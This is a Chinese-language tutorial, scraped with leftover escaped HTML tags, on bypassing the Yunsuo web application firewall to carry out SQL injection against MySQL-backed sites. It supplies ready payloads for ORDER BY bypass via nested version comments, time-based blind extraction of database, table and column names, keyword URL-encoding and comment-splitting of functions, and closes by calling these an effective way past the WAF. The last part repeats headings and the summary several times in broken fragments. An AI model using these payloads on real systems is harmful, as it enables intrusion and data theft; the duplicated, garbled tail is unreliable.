Bypass云锁WAF的SQL注入技术详解<\/h1>

1. 绕过ORDER BY限制<\/h2>

云锁WAF对order by<\/code>语句有严格的拦截机制，但可以通过MySQL注释语法绕过：<\/p>

\/*!40000\/*!30000order*\/\/*!40000\/*!30000by*\/1
<\/span><\/span><\/span><\/code><\/pre>原理说明<\/strong>：<\/p>

\/*!30000order*\/<\/code>是MySQL的条件注释语法，表示当MySQL版本大于3.00.00时执行其中的内容<\/li>
通过嵌套注释\/*!40000\/*!30000order*\/<\/code>增加混淆度<\/li>
数字30000\/40000代表数据库版本号，如果大于这个版本就会执行注释中的语句<\/li>
<\/ul>
2. 时间盲注技术<\/h2>
当无法绕过union select<\/code>时，可采用时间盲注技术：<\/p>
2.1 数据库长度探测<\/h3>
id=<\/span>2<\/span> and<\/span> length<\/span>(database<\/span>())><\/span>1<\/span>
<\/span><\/span><\/code><\/pre>2.2 数据库名获取<\/h3>
id=<\/span>2<\/span> and<\/span> if<\/span>(ascii(substr(database<\/span>\/**\/<\/span>(),1<\/span>,1<\/span>))><\/span>120<\/span>,1<\/span>,sleep\/**\/<\/span>(7<\/span>))
<\/span><\/span><\/code><\/pre>或：<\/p>
id=<\/span>2<\/span> and<\/span> if<\/span>(ascii(substr(database<\/span>\/*!()*\/<\/span>,1<\/span>,1<\/span>))><\/span>120<\/span>,1<\/span>,sleep\/*!(7)*\/<\/span>)
<\/span><\/span><\/code><\/pre>技巧<\/strong>：<\/p>

使用\/**\/<\/code>或\/*!()*\/<\/code>注释分隔函数名和括号<\/li>
sleep()<\/code>函数同样使用注释分隔<\/li>
<\/ul>
2.3 表名获取<\/h3>
id=<\/span>2<\/span> and<\/span> if<\/span>(ascii(substr((\/*!50000%53elect*\/<\/span>table_name<\/span> from<\/span> information_schema.tables where<\/span> table_schema=<\/span>database<\/span>\/**\/<\/span>() limit<\/span> 0<\/span>,1<\/span>),1<\/span>,1<\/span>))><\/span>96<\/span>,1<\/span>,sleep\/**\/<\/span>(5<\/span>))
<\/span><\/span><\/code><\/pre>关键突破点<\/strong>：<\/p>

select<\/code>被拦截，使用编码绕过：%53elect<\/code>（%53是'S'的URL编码）<\/li>
使用MySQL版本条件注释\/*!50000select*\/<\/code><\/li>
表名查询语句中的database()<\/code>同样使用注释分隔<\/li>
<\/ul>
2.4 字段名获取<\/h3>
id=<\/span>2<\/span> and<\/span> if<\/span>(ascii(substr((\/*!50000%53elect*\/<\/span>column_name<\/span> from<\/span> information_schema.columns where<\/span> table_schema=<\/span>database<\/span>\/**\/<\/span>() and<\/span> table_name<\/span>=<\/span>'xxxx'<\/span> limit<\/span> 0<\/span>,1<\/span>),1<\/span>,1<\/span>))><\/span>96<\/span>,1<\/span>,sleep\/**\/<\/span>(5<\/span>))
<\/span><\/span><\/code><\/pre>3. 其他绕过技巧<\/h2>


函数名与括号分离<\/strong>：<\/p>

database()<\/code> → database\/**\/()<\/code> 或 database\/*!()*\/<\/code><\/li>
<\/ul>
<\/li>

关键字编码<\/strong>：<\/p>

select<\/code> → %53elect<\/code><\/li>
<\/ul>
<\/li>

版本条件注释<\/strong>：<\/p>

\/*!50000select*\/<\/code> 表示MySQL版本大于5.00.00时执行<\/li>
<\/ul>
<\/li>

sleep函数绕过<\/strong>：<\/p>

sleep(5)<\/code> → sleep\/**\/(5)<\/code> 或 sleep\/*!(5)*\/<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
4. 注意事项<\/h2>

实际测试中发现union select<\/code>组合较难绕过，建议优先考虑时间盲注<\/li>
不同版本的云锁可能有不同的规则，需要根据实际情况调整payload<\/li>
注释符号的使用位置和方式对绕过效果有重要影响<\/li>
测试时应逐步构建payload，定位被拦截的具体部分<\/li>
<\/ol>
5. 总结<\/h2>
通过本文的技术手段，可以有效地绕过云锁WAF对SQL注入的防护，特别是在order by<\/code>和时间盲注场景下。关键在于灵活运用MySQL的注释语法、版本条件执行以及关键字编码等技术，分散WAF的检测规则。<\/p>

Bypass云锁WAF的SQL注入技术详解<\/h1>

2. 时间盲注技术<\/h2>
当无法绕过`union select<\/code>时，可采用时间盲注技术：<\/p>`

5. 总结<\/h2>
通过本文的技术手段，可以有效地绕过云锁WAF对SQL注入的防护，特别是在`order by<\/code>和时间盲注场景下。关键在于灵活运用MySQL的注释语法、版本条件执行以及关键字编码等技术，分散WAF的检测规则。<\/p>`

Bypass云锁WAF的SQL注入技术详解<\/h1>

2. 时间盲注技术<\/h2> 当无法绕过union select<\/code>时，可采用时间盲注技术：<\/p>

5. 总结<\/h2> 通过本文的技术手段，可以有效地绕过云锁WAF对SQL注入的防护，特别是在order by<\/code>和时间盲注场景下。关键在于灵活运用MySQL的注释语法、版本条件执行以及关键字编码等技术，分散WAF的检测规则。<\/p>

2. 时间盲注技术<\/h2>
当无法绕过`union select<\/code>时，可采用时间盲注技术：<\/p>`

5. 总结<\/h2>
通过本文的技术手段，可以有效地绕过云锁WAF对SQL注入的防护，特别是在`order by<\/code>和时间盲注场景下。关键在于灵活运用MySQL的注释语法、版本条件执行以及关键字编码等技术，分散WAF的检测规则。<\/p>`